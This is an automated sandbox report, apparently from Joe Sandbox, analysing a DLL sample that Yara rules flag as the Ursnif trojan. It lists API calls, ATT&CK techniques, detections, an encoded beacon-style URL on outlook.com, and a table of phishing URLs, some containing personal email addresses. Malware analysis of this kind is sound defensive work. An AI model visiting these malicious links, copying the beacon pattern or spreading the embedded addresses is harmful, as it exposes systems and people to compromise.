Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1D6A1F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6E1D6A1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1D6ED0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6E1D6ED0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1D4FB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_6E1D4FB4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1D27C8 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6E1D27C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1D6A1F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_6E1D6A1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1D6ED0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_6E1D6ED0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1D4FB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6E1D4FB4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1D27C8 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_6E1D27C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1D6A1F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6E1D6A1F

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000002.00000002.479086717.0000000001900000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481181205.0000000003A60000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.374670738.00000000031D0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000002.00000002.479086717.0000000001900000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481181205.0000000003A60000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.374670738.00000000031D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000002.00000002.479086717.0000000001900000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481181205.0000000003A60000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.374670738.00000000031D0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000002.00000002.479086717.0000000001900000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481181205.0000000003A60000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.374670738.00000000031D0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_02EA9135 cpuid

2_2_02EA9135

Source: C:\Windows\System32\loaddll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,	2_2_6E1DD7F4
Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	2_2_6E1D8C74
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	2_2_6E1E3C75
Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	2_2_6E1DD186
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,	2_2_6E1E3E03
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	2_2_6E1DE67A
Source: C:\Windows\System32\loaddll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	2_2_6E1DE791
Source: C:\Windows\System32\loaddll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_6E1E74C2
Source: C:\Windows\System32\loaddll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	2_2_6E1DEA6F
Source: C:\Windows\System32\loaddll32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	2_2_6E1DEB30
Source: C:\Windows\System32\loaddll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	2_2_6E1E734F
Source: C:\Windows\System32\loaddll32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	2_2_6E1DEB97
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,	2_2_6E1E7383
Source: C:\Windows\System32\loaddll32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,	2_2_6E1DEBD3
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	2_2_6E1DE829
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,	5_2_6E1DD7F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	5_2_6E1D8C74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	5_2_6E1E3C75
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	5_2_6E1DD186
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	5_2_6E1E3E03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	5_2_6E1DE67A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	5_2_6E1DE791
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	5_2_6E1E74C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	5_2_6E1DEA6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	5_2_6E1DEB30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	5_2_6E1E734F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	5_2_6E1DEB97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,	5_2_6E1E7383
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,	5_2_6E1DEBD3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	5_2_6E1DE829
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,	6_2_6E1DD7F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	6_2_6E1D8C74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	6_2_6E1E3C75
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	6_2_6E1DD186
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	6_2_6E1E3E03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	6_2_6E1DE67A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_6E1DE791
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	6_2_6E1E74C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_6E1DEA6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_6E1DEB30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	6_2_6E1E734F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_6E1DEB97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,	6_2_6E1E7383
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,	6_2_6E1DEBD3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	6_2_6E1DE829

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6E1A1ADA GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

2_2_6E1A1ADA

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_02EA9135 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

2_2_02EA9135

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6E1DB23D __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,__invoke_watson,__invoke_watson,

2_2_6E1DB23D

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6E1A1F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

2_2_6E1A1F0E

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Security Software Discovery11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	File and Directory Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery23	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
c36.dll	3%	Metadefender		Browse
c36.dll	14%	ReversingLabs	Win32.Trojan.Ursnif

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.rundll32.exe.1180000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File
2.2.loaddll32.exe.2ea0000.0.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
outlook.com	40.97.128.194	true	false	high
ZRH-efz.ms-acdc.office.com	52.98.163.18	true	false	high
www.outlook.com	unknown	unknown	false	high
outlook.office365.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://outlook.com/jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2F/gFwgPVc3A_2BGFDYWcxhxu6/95nq35D0eQ/F_2Bmi0291iuqGJ2R/Lk7llVNKTp1W/ZOLoPeu_2F4/nTZWoYdvVj3RXx/XwwFNQtzd_2FkWk0UpQTO/wz8fmYfCTc8Ok1p_/2Bs3Gpetltr/L74Ig5cboZ/m.crw	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.wikipedia.com/	msapplication.xml6.24.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.amazon.com/	msapplication.xml.24.dr	false		high
http://www.nytimes.com/	msapplication.xml3.24.dr	false		high
https://outlook.office365.com/jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2	{6C6C1DAB-E104-11EB-90E4-ECF4BB862DED}.dat.24.dr	false		high
http://www.live.com/	msapplication.xml2.24.dr	false		high
http://www.reddit.com/	msapplication.xml4.24.dr	false		high
http://www.twitter.com/	msapplication.xml5.24.dr	false		high
http://www.youtube.com/	msapplication.xml7.24.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
40.97.128.194	outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.97.201.194	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.98.163.18	ZRH-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	446420
Start date:	09.07.2021
Start time:	15:22:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	c36.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.troj.winDLL@17/18@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 15.1% (good quality ratio 14.3%) Quality average: 79.2% Quality standard deviation: 28.9%
HCA Information:	Successful, ratio: 80% Number of executed functions: 76 Number of non-executed functions: 137
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, ielowutil.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 13.88.21.125, 23.54.113.53, 52.147.198.201, 52.255.188.83, 95.100.54.203, 104.43.139.144, 13.64.90.137, 20.82.210.154, 2.18.105.186, 20.82.209.183, 152.199.19.161, 23.10.249.43, 23.10.249.26 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ie9comview.vo.msecnd.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/446420/sample/c36.dll

Simulations

Behavior and APIs

Time	Type	Description
15:24:11	API Interceptor	1x Sleep call for process: loaddll32.exe modified
15:24:51	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
40.97.128.194	http://outlook.com/owa/airmasteraustralia.onmicrosoft.com	Get hash	malicious	Browse	outlook.com/owa/airmasteraustralia.onmicrosoft.com

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
outlook.com	oEE058tCoG.exe	Get hash	malicious	Browse	40.93.207.1
	2Bmv1UZL2m.exe	Get hash	malicious	Browse	52.101.24.0
	oS4iWYYsx7.exe	Get hash	malicious	Browse	104.47.53.36
	P4SRvI1baM.exe	Get hash	malicious	Browse	104.47.54.36
	051y0i7M8q.exe	Get hash	malicious	Browse	40.93.207.0
	lEbR9gFgLr.exe	Get hash	malicious	Browse	104.47.54.36
	0OvBoFRzgC.exe	Get hash	malicious	Browse	104.47.54.36
	A1qhcbngFV.exe	Get hash	malicious	Browse	104.47.54.36
ZRH-efz.ms-acdc.office.com	Signed pages of agreement copy.html	Get hash	malicious	Browse	52.97.232.194
	PI_DRAFT.exe	Get hash	malicious	Browse	52.97.186.114
	moog_invoice_Wednesday 02242021._xslx.hTML	Get hash	malicious	Browse	52.97.201.210
	https://app.box.com/s/yihmp2wywbz9lgdbg26g3tc1piwkalab	Get hash	malicious	Browse	52.97.232.210
	http://resa.credit-financebank.com/donc/dcn/?email=bWNnaW5udEByZXNhLm5ldA==	Get hash	malicious	Browse	52.97.201.242
	https://loginpro-288816.ew.r.appspot.com/#joshua.kwon@ttc.ca	Get hash	malicious	Browse	52.97.186.98
	http://YUEipfm.zackgillum.com/%40120%40240%40#james.kelsaw@puc.texas.gov	Get hash	malicious	Browse	52.97.232.194
